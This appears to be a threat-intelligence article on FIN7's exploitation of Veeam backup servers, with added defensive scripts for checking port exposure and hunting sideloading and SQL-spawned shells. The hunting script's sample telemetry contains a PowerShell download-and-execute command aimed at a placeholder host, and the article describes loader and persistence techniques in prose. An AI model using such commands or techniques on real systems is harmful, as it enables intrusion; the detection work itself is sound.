Introduction
The cybersecurity landscape is a battleground where organizations continuously defend their data from persistent adversaries. Among the most notorious of these adversaries is the financially motivated cybercrime group known as FIN7, also referred to as Carbon Spider. This group has been in operation since at least 2013 and has been associated with the Carbanak malware family. The group was known in its early years for launching malware attacks against organizations from the retail, restaurant, and hospitality sectors with the goal of stealing credit card information. However, FIN7 has also expanded into ransomware, being associated with the Darkside and BlackMatter ransomware families, and more recently BlackCat/ALPHV.
Recently, FIN7 has turned its focus onto a new target: Veeam Backup & Replication servers. Veeam Backup & Replication is a backup and disaster recovery solution that provides data protection for virtual, physical, and cloud-based workloads, and it is widely used by organizations of all sizes to protect their critical data. A backup server is an attractive target because it stores credentials for the infrastructure it backs up. The recent attacks by FIN7 highlight the importance of promptly patching vulnerabilities in enterprise software and of keeping such servers off the public internet, especially when they contain sensitive data.
Vulnerability Exploited by FIN7
The vulnerability suspected to have been exploited by FIN7 is tracked as CVE-2023-27532. This flaw, patched by Veeam on March 7, 2023, allows an unauthenticated attacker who can reach the Veeam backup service on TCP port 9401 to extract the credentials stored in the server's configuration database and potentially gain access to the backup server host itself. A proof-of-concept (PoC) exploit was published on March 23, 2023, only days before the campaign began. The PoC goes beyond credential theft: it includes remote command execution via shell commands issued through the Veeam SQL Server instance, which produces the same execution chain observed in the FIN7 campaign. The practical consequence is that a server on which port 9401 was reachable from untrusted networks and the March patch had not been applied warrants investigation, not just patching.
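The first question a defender asks after reading the paragraph above is which backup servers actually accept connections on TCP 9401 from outside. The following script is an added example, not code from the original article or from Veeam: it checks a host list for reachability of that port concurrently, and includes an offline self-check against a local listener so it can be run without network access. The host list, timeout and worker count are assumptions. A reachable port proves exposure, not vulnerability; the installed build still has to be checked on the server.

```python
"""Exposure check for the port named in the advisory: which of a list of hosts
accept a TCP connection on 9401 from wherever this runs (run it from an
external vantage point to answer "is it reachable from the internet?").
Added example; host list, timeout and worker count are assumptions."""
import socket
from concurrent.futures import ThreadPoolExecutor

VEEAM_BACKUP_SERVICE_PORT = 9401   # port named in the CVE-2023-27532 advisory


def tcp_reachable(host, port=VEEAM_BACKUP_SERVICE_PORT, timeout=2.0):
    """True if a TCP handshake to host:port completes within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:          # refused, filtered/timed out, or unresolvable
        return False


def exposed_hosts(hosts, port=VEEAM_BACKUP_SERVICE_PORT, timeout=2.0, workers=32):
    """Subset of hosts that accept connections on port, probed concurrently."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda h: tcp_reachable(h, port, timeout), hosts))
    return [h for h, ok in zip(hosts, results) if ok]


def self_check():
    """Offline sanity check: a local listener must show as reachable and a
    freshly released ephemeral port must not. Returns (open_seen, closed_seen)."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    open_port = listener.getsockname()[1]
    probe = socket.socket()
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                      # nothing listens on closed_port now
    try:
        return (tcp_reachable("127.0.0.1", open_port, timeout=1.0),
                tcp_reachable("127.0.0.1", closed_port, timeout=1.0))
    finally:
        listener.close()


if __name__ == "__main__":
    # Constructed inventory of backup servers (RFC 5737 documentation addresses).
    inventory = ["192.0.2.10", "198.51.100.20"]
    for h in exposed_hosts(inventory):
        print(f"{h}: TCP/{VEEAM_BACKUP_SERVICE_PORT} reachable; confirm the installed build is patched")
```

Run it from an external vantage point (a cloud VM outside the corporate network) to reproduce the attacker's view; run from inside, it only tells you the service is up.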
Attack Methodology
Forensic analysis of the compromised Veeam servers shows a sequence of events that paints a clear picture of FIN7's approach. The SQL Server process “sqlservr.exe” belonging to the Veeam Backup instance was used to execute a batch script. That script downloaded a PowerShell script and executed it directly in memory. The PowerShell script, known as POWERTRASH, is an obfuscated loader previously attributed to FIN7; it unpacks embedded payloads and executes them using reflective PE injection, so the final payload is mapped into memory rather than written to disk as a standalone executable. A backdoor known as DICELOADER or Lizar, also previously associated with FIN7, was observed in the recent attacks against Veeam servers.
The DICELOADER backdoor allowed the attackers to deploy additional custom batch and PowerShell scripts, some of them identical to scripts used by FIN7 in other attacks. Some scripts collected information about the local system, such as running processes, open network connections, listening ports, and IP configuration. Another used Windows Management Instrumentation (WMI) to remotely collect information about other systems on the network, and yet another script known to be part of FIN7's arsenal resolved the collected IP addresses to hostnames, identifying the computers on the network.
Persistence and Lateral Movement
An interesting aspect of FIN7's attack was the persistence method. A custom script called gup18.ps1, not observed before, set up a persistence mechanism that ensures the DICELOADER backdoor starts again after a reboot. The backdoor is executed through DLL sideloading against gup.exe, the updater that ships with the legitimate Notepad++ application. The attackers drop the legitimate gup.exe together with its configuration file and a maliciously modified libcurl.dll, the library that gup.exe is designed to load; the modified library decodes the DICELOADER payload from another file and executes it. Because gup.exe itself is a legitimate binary, the persistence entry looks benign unless the location of gup.exe, or of the libcurl.dll it loads, is checked against the expected Notepad++ installation path.
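The two host-level behaviours described in this section and in the attack methodology above (SQL Server spawning a shell that runs an in-memory PowerShell loader, and gup.exe sideloading libcurl.dll from somewhere other than the Notepad++ updater directory) can be expressed as simple hunting rules over process-creation and image-load telemetry. The script below is an added example, not code from the original article or from any vendor: it runs three such rules over constructed Sysmon-style events. The Notepad++ updater path, the SQL Server instance path, the script names and the 203.0.113.10 URL are assumptions made for the sample data, and the PowerShell markers are generic download-cradle indicators rather than anything FIN7-specific.

```python
"""Hunting rules for the two host-level behaviours described above, run over
constructed Sysmon-style events (not real telemetry). Event 1 = process
creation, event 7 = image load; field names follow Sysmon's schema."""
import re
from pathlib import PureWindowsPath

# Assumed legitimate location of the Notepad++ updater (WinGup) and its libcurl.dll.
NPP_UPDATER_DIR = r"c:\program files\notepad++\updater"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Generic markers of download-and-run-in-memory PowerShell; not FIN7-specific.
CRADLE_PATTERN = re.compile(
    r"\b(?:iex|invoke-expression|downloadstring|downloadfile|frombase64string)\b"
    r"|\s-e(?:c|nc|ncodedcommand)?\b",
    re.IGNORECASE,
)


def _name(path):
    return PureWindowsPath(path).name.lower()


def _dir(path):
    return str(PureWindowsPath(path).parent).lower()


def rule_sql_spawns_shell(ev):
    """SQL Server spawning a shell, the pattern left by xp_cmdshell-style execution."""
    if (ev["EventID"] == 1 and _name(ev["ParentImage"]) == "sqlservr.exe"
            and _name(ev["Image"]) in SHELLS):
        return "sqlservr.exe spawned %s: %s" % (_name(ev["Image"]), ev["CommandLine"])
    return None


def rule_powershell_cradle(ev):
    """PowerShell command line carrying download / in-memory execution markers."""
    if ev["EventID"] != 1 or _name(ev["Image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    hits = sorted({m.group(0).strip().lower() for m in CRADLE_PATTERN.finditer(ev["CommandLine"])})
    return "PowerShell download/in-memory execution markers %s" % hits if hits else None


def rule_gup_sideload(ev):
    """gup.exe running from, or loading libcurl.dll from, outside the Notepad++ updater directory."""
    if _name(ev["Image"]) != "gup.exe":
        return None
    if ev["EventID"] == 1 and _dir(ev["Image"]) != NPP_UPDATER_DIR:
        return "gup.exe executing from unexpected directory %s" % _dir(ev["Image"])
    loaded = ev.get("ImageLoaded", "")
    if ev["EventID"] == 7 and _name(loaded) == "libcurl.dll" and _dir(loaded) != NPP_UPDATER_DIR:
        return "gup.exe loaded libcurl.dll from %s" % _dir(loaded)
    return None


RULES = (rule_sql_spawns_shell, rule_powershell_cradle, rule_gup_sideload)


def hunt(events):
    """Return (RecordId, rule name, message) for every rule that fires on every event."""
    findings = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                findings.append((ev["RecordId"], rule.__name__, msg))
    return findings


# Constructed sample telemetry; paths, instance name and the TEST-NET URL are made up.
SQL = r"C:\Program Files\Microsoft SQL Server\MSSQL13.VEEAMSQL2016\MSSQL\Binn\sqlservr.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1, "ParentImage": SQL, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "C:\Windows\Temp\upd.bat"'},
    {"RecordId": 2, "EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/p.ps1')\""},
    {"RecordId": 3, "EventID": 1, "ParentImage": r"C:\Program Files\Notepad++\notepad++.exe",
     "Image": r"C:\Program Files\Notepad++\updater\gup.exe", "CommandLine": "gup.exe -v8.5"},
    {"RecordId": 4, "EventID": 1, "ParentImage": PS, "Image": r"C:\ProgramData\Update\gup.exe",
     "CommandLine": "gup.exe"},
    {"RecordId": 5, "EventID": 7, "Image": r"C:\ProgramData\Update\gup.exe",
     "ImageLoaded": r"C:\ProgramData\Update\libcurl.dll"},
    {"RecordId": 6, "EventID": 7, "Image": r"C:\Program Files\Notepad++\updater\gup.exe",
     "ImageLoaded": r"C:\Program Files\Notepad++\updater\libcurl.dll"},
    {"RecordId": 7, "EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup-report.ps1"},
]

if __name__ == "__main__":
    for record_id, rule_name, message in hunt(SAMPLE_EVENTS):
        print(f"[{record_id}] {rule_name}: {message}")
```

Records 3, 6 and 7 are the benign controls: a real Notepad++ update and an ordinary scheduled PowerShell script must not fire, which is why the sideload rule keys on the directory rather than the file name and why the cradle pattern anchors `-e` so that `-ExecutionPolicy` is not mistaken for `-EncodedCommand`. On a real estate the first rule alone (sqlservr.exe with a shell child) is worth alerting on for any SQL Server instance that backs a product like Veeam, because that instance has no business spawning interactive shells.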
The attackers also executed Veeam-specific commands: SQL queries to extract information from the Veeam backup database and a custom script to retrieve stored passwords from the server. This shows FIN7's understanding of the specific software they were targeting and their ability to tailor their approach to it.
In summary, the FIN7 cybercrime group’s campaign against Veeam Backup & Replication servers underlines the importance of continuous monitoring and patching of enterprise software. Organizations need to be vigilant and proactive in their cybersecurity efforts, especially when dealing with threats from sophisticated and persistent threat actors like FIN7.